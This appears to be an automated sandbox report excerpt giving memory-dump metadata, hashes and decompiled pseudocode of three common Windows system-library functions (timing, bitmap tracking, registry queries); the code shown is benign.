
Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction ID: 097d4783adac6b5c0d9c765eb96a3231d038b0de44955d8a77c44c8750b91851
Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
Instruction Fuzzy Hash: 34812732E08396CFEB114F6AC8C0259BF56FF52600B68477BE9528F741C265B84AD7A1

Uniqueness

Uniqueness Score: -1.00%

Function 1E3D6A60, Relevance: .2, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E1E3D6A60(intOrPtr* _a4) {
				signed int _v8;
				char _v24;
				signed char _v25;
				intOrPtr* _v32;
				signed char _v36;
				signed int _v40;
				intOrPtr* _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr* _v68;
				signed char _v72;
				signed char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed char _v88;
				signed int _v92;
				signed char _v96;
				char _v100;
				signed int _v104;
				void* _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t101;
				void* _t105;
				signed int _t112;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0x1e49d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E1E3E9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0x1e496908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E1E3ECF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E1E3ECF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E1E3ED340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E1E3EB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E1E3EAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E1E3ED000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E1E3EAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}

0x1e3d6a6f
0x1e3d6a72
0x1e3d6a78
0x1e3d6a7c
0x1e3d6a7f
0x1e3d6a87
0x1e418049
0x1e418049
0x1e41804e
0x1e41804f
0x1e418057
0x1e41805c
0x00000000
0x1e3d6a8d
0x1e3d6a92
0x1e3d6a92
0x1e3d6a94
0x1e3d6a99
0x1e3d6a9c
0x1e3d6a9f
0x1e3d6aa2
0x1e3d6aaa
0x1e3d6ab0
0x1e417eae
0x1e417eb4
0x1e417eb9
0x00000000
0x00000000
0x00000000
0x00000000
0x1e417ebf
0x1e417ebf
0x1e417ebf
0x1e417ec1
0x1e417ec6
0x00000000
0x00000000
0x1e417ece
0x1e417edb
0x1e417ee5
0x1e417ee7
0x1e417ee7
0x1e417edd
0x1e417edd
0x1e417edd
0x1e417eea
0x1e417ed0
0x1e417ed0
0x1e417ed3
0x1e417ed3
0x1e417eec
0x1e417ef8
0x1e417f00
0x1e417f07
0x1e417f0a
0x1e417f19
0x1e417f1b
0x1e417f23
0x1e417f25
0x1e417f28
0x1e417f2e
0x1e417f31
0x1e417f34
0x1e417f37
0x1e417f3c
0x00000000
0x1e417f3e
0x1e417f3e
0x1e417f41
0x1e3d6b35
0x1e3d6b38
0x1e3d6b44
0x1e3d6b4c
0x1e3d6b4e
0x1e3d6b51
0x1e3d6b69
0x1e3d6b69
0x1e417f3c
0x1e418046
0x00000000
0x1e418046
0x1e3d6abc
0x1e3d6aca
0x1e417f49
0x1e3d6b13
0x1e3d6b13
0x1e3d6b16
0x1e3d6b1e
0x1e417fe7
0x1e417fea
0x1e417fed
0x1e417ff0
0x1e417ff2
0x1e417ff4
0x1e417ffa
0x00000000
0x00000000
0x1e418000
0x1e418003
0x1e418006
0x1e418009
0x1e41800b
0x1e41800d
0x1e418010
0x1e41801f
0x00000000
0x00000000
0x1e418025
0x1e3d6b2f
0x1e3d6b2f
0x1e3d6b32
0x00000000
0x1e3d6b32
0x1e3d6b26
0x1e418030
0x1e41803a
0x1e41803c
0x1e41803c
0x1e418032
0x1e418032
0x1e418032
0x1e41803f
0x1e3d6b2c
0x1e3d6b2c
0x1e3d6b2c
0x00000000
0x1e3d6b26
0x1e3d6ad0
0x1e3d6ad6
0x1e3d6ade
0x1e3d6ae0
0x1e3d6ae0
0x1e3d6ae5
0x1e417f53
0x1e3d6aeb
0x1e3d6aeb
0x1e3d6aeb
0x1e3d6af3
0x1e417f5e
0x1e417f61
0x1e417f68
0x1e417f69
0x1e417f6b
0x1e417f70
0x1e417f71
0x1e417f76
0x1e417f77
0x1e417f7c
0x1e417f86
0x1e417f88
0x1e417f8d
0x1e417f92
0x1e417f97
0x1e417f98
0x1e417f99
0x1e417f9a
0x1e417f9f
0x1e417fa0
0x1e417fa5
0x1e417faa
0x1e417faa
0x1e417faf
0x1e417fdc
0x1e417fdf
0x00000000
0x1e417fb1
0x1e417fb1
0x1e417fb3
0x1e417fb8
0x1e417fd4
0x1e417fd4
0x00000000
0x1e417fd4
0x1e417fba
0x1e417fbc
0x1e417fc2
0x1e417fc4
0x1e417fc4
0x1e417fc7
0x1e417fcb
0x1e417fcc
0x1e417fd1
0x00000000
0x1e417fd1
0x1e3d6b04
0x1e3d6b04
0x1e3d6b0b
0x00000000
0x00000000
0x1e3d6b11
0x00000000
0x1e3d6b11
0x1e3d6af3

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25d7fe408e379fbd9e04f26f81a17fe514af80b3fdc9f4be6145c914c7c14654
Instruction ID: fd7f7d078050872604af7e68224df1911474dec70892e1aabf963c9012fd0808
Opcode Fuzzy Hash: 25d7fe408e379fbd9e04f26f81a17fe514af80b3fdc9f4be6145c914c7c14654
Instruction Fuzzy Hash: 72817A75E003599FDF10CF99C891BEEBBF6AF09300F15826AE955AB340D735A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1E471D55, Relevance: .2, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E1E471D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t97;
				signed int _t101;
				signed int _t112;
				unsigned int _t113;
				signed int _t121;
				signed int _t128;
				signed int _t130;
				signed char _t135;
				intOrPtr _t136;
				intOrPtr _t137;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t149;
				signed int _t150;
				void* _t154;
				signed int* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				intOrPtr _t171;
				signed int _t172;
				void* _t175;
				signed int* _t178;
				signed int _t179;
				signed int _t180;
				signed char _t181;
				signed char _t183;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				void* _t191;
				void* _t197;

				_t137 = __ecx;
				_push(0x64);
				_push(0x1e481070);
				E1E3FD08C(__ebx, __edi, __esi);
				 *(_t191 - 0x24) = __edx;
				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
				_t135 = 0;
				 *(_t191 - 0x40) = 0;
				_t171 =  *((intOrPtr*)(__ecx + 0xc));
				_t189 =  *(__ecx + 8);
				 *(_t191 - 0x28) = _t189;
				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
				 *(_t191 - 0x50) = _t189;
				_t187 = __edx << 0xf;
				 *(_t191 - 0x4c) = _t187;
				_t190 = 0x8000;
				 *(_t191 - 0x34) = 0x8000;
				_t172 = _t171 - _t187;
				if(_t172 <= 0x8000) {
					_t190 = _t172;
					 *(_t191 - 0x34) = _t172;
				}
				 *(_t191 - 0x68) = _t135;
				 *(_t191 - 0x64) = _t135;
				L3:
				while(1) {
					if( *(_t191 + 8) != 0) {
						L22:
						 *(_t191 + 8) = _t135;
						E1E47337F(_t137, 1, _t191 - 0x74);
						_t97 =  *((intOrPtr*)(_t191 - 0x20));
						_t175 =  *(_t97 + 0x14);
						 *(_t191 - 0x58) = _t175;
						_t139 = _t97 + 0x14;
						 *(_t191 - 0x44) = _t139;
						_t197 = _t175 - 0xffffffff;
						if(_t197 == 0) {
							 *_t139 =  *(_t191 - 0x24);
							E1E4733B6(_t191 - 0x74);
							 *(_t191 - 0x40) = 1;
							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t101 =  *_t60;
							_t141 =  *(_t191 - 0x24);
							asm("bt [eax], ecx");
							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
							if(__eflags == 0) {
								goto L41;
							} else {
								_t103 = _t187 - 1 + _t190;
								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
									goto L41;
								} else {
									__eflags = _t190 - 1;
									if(__eflags > 0) {
										_t143 =  *(_t191 - 0x28);
										_t178 = _t143 + (_t187 >> 5) * 4;
										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
										 *(_t191 - 0x50) = _t144;
										_t112 =  *_t178;
										 *(_t191 - 0x54) = _t112;
										_t113 = _t112 | 0xffffffff;
										__eflags = _t178 - _t144;
										if(_t178 != _t144) {
											_t103 = _t113 << _t187;
											__eflags =  *_t178 & _t103;
											if(( *_t178 & _t103) != 0) {
												goto L41;
											} else {
												_t103 =  *(_t191 - 0x50);
												while(1) {
													_t178 =  &(_t178[1]);
													__eflags = _t178 - _t103;
													if(_t178 == _t103) {
														break;
													}
													__eflags =  *_t178 - _t135;
													if( *_t178 != _t135) {
														goto L41;
													} else {
														continue;
													}
													goto L42;
												}
												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
												__eflags = _t103;
												_t149 =  *_t178;
												goto L38;
											}
										} else {
											_t154 = 0x20;
											_t103 = _t113 >> _t154 - _t190 << _t187;
											_t149 =  *(_t191 - 0x54);
											L38:
											_t150 = _t149 & _t103;
											__eflags = _t150;
											asm("sbb cl, cl");
											_t135 =  ~_t150 + 1;
											_t141 =  *(_t191 - 0x24);
											goto L39;
										}
									} else {
										if(__eflags != 0) {
											goto L41;
										} else {
											_t103 =  *(_t191 - 0x28);
											asm("bt [eax], edi");
											if(__eflags >= 0) {
												L40:
												_t136 =  *((intOrPtr*)(_t191 - 0x20));
												asm("lock btr [eax], ecx");
												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
												_push(0x4000);
												_push(_t191 - 0x5c);
												_push(_t191 - 0x60);
												_push(0xffffffff);
												_t103 = E1E3E96E0();
											} else {
												L39:
												__eflags = _t135;
												if(_t135 == 0) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
								}
							}
						} else {
							E1E4733B6(_t191 - 0x74);
							_t172 = _t191 - 0x58;
							E1E3DE18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1e495880);
							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
							_t121 =  *_t51;
							asm("bt [eax], ecx");
							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
								goto L41;
							} else {
								_t137 =  *((intOrPtr*)(_t191 - 0x20));
								continue;
							}
						}
					} else {
						 *(_t191 - 4) = _t135;
						_t103 = _t187 - 1 + _t190;
						 *(_t191 - 0x30) = _t103;
						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
							__eflags = _t190 - 1;
							if(__eflags > 0) {
								_t179 =  *(_t191 - 0x28);
								_t161 = _t179 + (_t187 >> 5) * 4;
								 *(_t191 - 0x2c) = _t161;
								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
								 *(_t191 - 0x44) = _t128;
								_t180 =  *_t161;
								__eflags = _t161 - _t128;
								if(_t161 != _t128) {
									_t103 = (_t128 | 0xffffffff) << _t187;
									__eflags = _t103 & _t180;
									if((_t103 & _t180) != 0) {
										goto L5;
									} else {
										_t130 =  *(_t191 - 0x2c);
										_t164 =  *(_t191 - 0x44);
										while(1) {
											_t130 = _t130 + 4;
											 *(_t191 - 0x2c) = _t130;
											_t180 =  *_t130;
											__eflags = _t130 - _t164;
											if(_t130 == _t164) {
												break;
											}
											__eflags = _t180;
											if(_t180 == 0) {
												continue;
											} else {
												goto L5;
											}
											goto L19;
										}
										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
										__eflags = _t103;
										goto L17;
									}
								} else {
									_t167 = 0x20;
									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
									L17:
									_t183 =  ~(_t180 & _t103);
									asm("sbb dl, dl");
									goto L18;
								}
							} else {
								if(__eflags != 0) {
									goto L5;
								} else {
									_t103 =  *(_t191 - 0x28);
									asm("bt [eax], edi");
									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
									asm("sbb dl, dl");
									L18:
									_t181 = _t183 + 1;
									__eflags = _t181;
								}
							}
						} else {
							L5:
							_t181 = _t135;
						}
						L19:
						 *(_t191 - 0x19) = _t181;
						_t163 = _t181 & 0x000000ff;
						 *(_t191 - 0x48) = _t163;
						 *(_t191 - 4) = 0xfffffffe;
						if(_t163 == 0) {
							L41:
							_t136 =  *((intOrPtr*)(_t191 - 0x20));
						} else {
							_t137 =  *((intOrPtr*)(_t191 - 0x20));
							goto L22;
						}
					}
					L42:
					__eflags =  *(_t191 - 0x40);
					if( *(_t191 - 0x40) != 0) {
						_t91 = _t136 + 0x14; // 0x14
						_t142 = _t91;
						 *_t91 = 0xffffffff;
						__eflags = 0;
						asm("lock or [eax], edx");
						_t103 = E1E3DDFDF(_t91, 1, _t142);
					}
					return E1E3FD0D1(_t103);
				}
			}

0x1e471d55
0x1e471d55
0x1e471d57
0x1e471d5c
0x1e471d63
0x1e471d66
0x1e471d69
0x1e471d6c
0x1e471d6e
0x1e471d71
0x1e471d74
0x1e471d77
0x1e471d7a
0x1e471d7d
0x1e471d82
0x1e471d85
0x1e471d88
0x1e471d8d
0x1e471d90
0x1e471d94
0x1e471d96
0x1e471d98
0x1e471d98
0x1e471d9b
0x1e471d9e
0x00000000
0x1e471da1
0x1e471da5
0x1e471e78
0x1e471e78
0x1e471e82
0x1e471e87
0x1e471e8a
0x1e471e8d
0x1e471e92
0x1e471e95
0x1e471e98
0x1e471e9b
0x1e471ede
0x1e471ee3
0x1e471ee8
0x1e471ef2
0x1e471ef2
0x1e471ef5
0x1e471ef8
0x1e471efe
0x1e471f03
0x00000000
0x1e471f09
0x1e471f0c
0x1e471f0e
0x1e471f11
0x00000000
0x1e471f17
0x1e471f17
0x1e471f1a
0x1e471f31
0x1e471f34
0x1e471f3f
0x1e471f42
0x1e471f45
0x1e471f47
0x1e471f4a
0x1e471f4d
0x1e471f4f
0x1e471f63
0x1e471f65
0x1e471f67
0x00000000
0x1e471f69
0x1e471f69
0x1e471f72
0x1e471f72
0x1e471f75
0x1e471f77
0x00000000
0x00000000
0x1e471f6e
0x1e471f70
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1e471f70
0x1e471f83
0x1e471f83
0x1e471f85
0x00000000
0x1e471f85
0x1e471f51
0x1e471f53
0x1e471f5a
0x1e471f5c
0x1e471f87
0x1e471f87
0x1e471f87
0x1e471f8b
0x1e471f8d
0x1e471f90
0x00000000
0x1e471f90
0x1e471f1c
0x1e471f1c
0x00000000
0x1e471f22
0x1e471f22
0x1e471f25
0x1e471f28
0x1e471f97
0x1e471f97
0x1e471f9d
0x1e471fa7
0x1e471faa
0x1e471fb1
0x1e471fb9
0x1e471fbd
0x1e471fbe
0x1e471fc0
0x1e471f2a
0x1e471f93
0x1e471f93
0x1e471f95
0x00000000
0x00000000
0x00000000
0x00000000
0x1e471f95
0x1e471f28
0x1e471f1c
0x1e471f1a
0x1e471f11
0x1e471e9d
0x1e471ea0
0x1e471eae
0x1e471eb4
0x1e471ebc
0x1e471ebc
0x1e471ec2
0x1e471ec8
0x1e471ecd
0x00000000
0x1e471ed3
0x1e471ed3
0x00000000
0x1e471ed3
0x1e471ecd
0x1e471dab
0x1e471dab
0x1e471db1
0x1e471db3
0x1e471db9
0x1e471dbf
0x1e471dc2
0x1e471dda
0x1e471ddd
0x1e471de0
0x1e471de9
0x1e471dec
0x1e471def
0x1e471df1
0x1e471df3
0x1e471e0a
0x1e471e0c
0x1e471e0e
0x00000000
0x1e471e10
0x1e471e10
0x1e471e13
0x1e471e16
0x1e471e16
0x1e471e19
0x1e471e1c
0x1e471e1e
0x1e471e20
0x00000000
0x00000000
0x1e471e22
0x1e471e24
0x00000000
0x1e471e26
0x00000000
0x1e471e26
0x00000000
0x1e471e24
0x1e471e30
0x1e471e30
0x00000000
0x1e471e30
0x1e471df5
0x1e471df7
0x1e471e01
0x1e471e32
0x1e471e34
0x1e471e36
0x00000000
0x1e471e36
0x1e471dc4
0x1e471dc4
0x00000000
0x1e471dc6
0x1e471dc6
0x1e471dc9
0x1e471dcf
0x1e471dd1
0x1e471e38
0x1e471e38
0x1e471e38
0x1e471e38
0x1e471dc4
0x1e471dbb
0x1e471dbb
0x1e471dbb
0x1e471dbb
0x1e471e3a
0x1e471e3a
0x1e471e3d
0x1e471e40
0x1e471e43
0x1e471e6f
0x1e471fc7
0x1e471fc7
0x1e471e75
0x1e471e75
0x00000000
0x1e471e75
0x1e471e6f
0x1e471fca
0x1e471fca
0x1e471fce
0x1e471fd0
0x1e471fd0
0x1e471fd3
0x1e471fd9
0x1e471fde
0x1e471fe4
0x1e471fe4
0x1e471fee
0x1e471fee

Memory Dump Source

Source File: 0000000A.00000002.490998213.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true

Associated: 0000000A.00000002.491590408.000000001E49B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.491609660.000000001E49F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
Instruction ID: 7fb750c4c9091f84531e326bb53b5614921b848db16c385013b262d1adb4b2f1
Opcode Fuzzy Hash: d171fcee72b4c63508baba17af840fe0ba1a22118bc2bea95ed4e8bb6a1206ce
Instruction Fuzzy Hash: 19814C75E102598FDB08CFA9C8909ECB7F3BF49354B14436AE415AB394DB31A94ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E3AC600, Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E1E3AC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x1e49d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E1E3B6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E1E3EB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1e497b9c; // 0x0
					_t74 = L1E3C4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E1E3E9650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L1E3C77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E1E3EF3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E1E3E13C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L1E3C77F0( *( *[fs:0x30] + 0x18), 0, _t102);
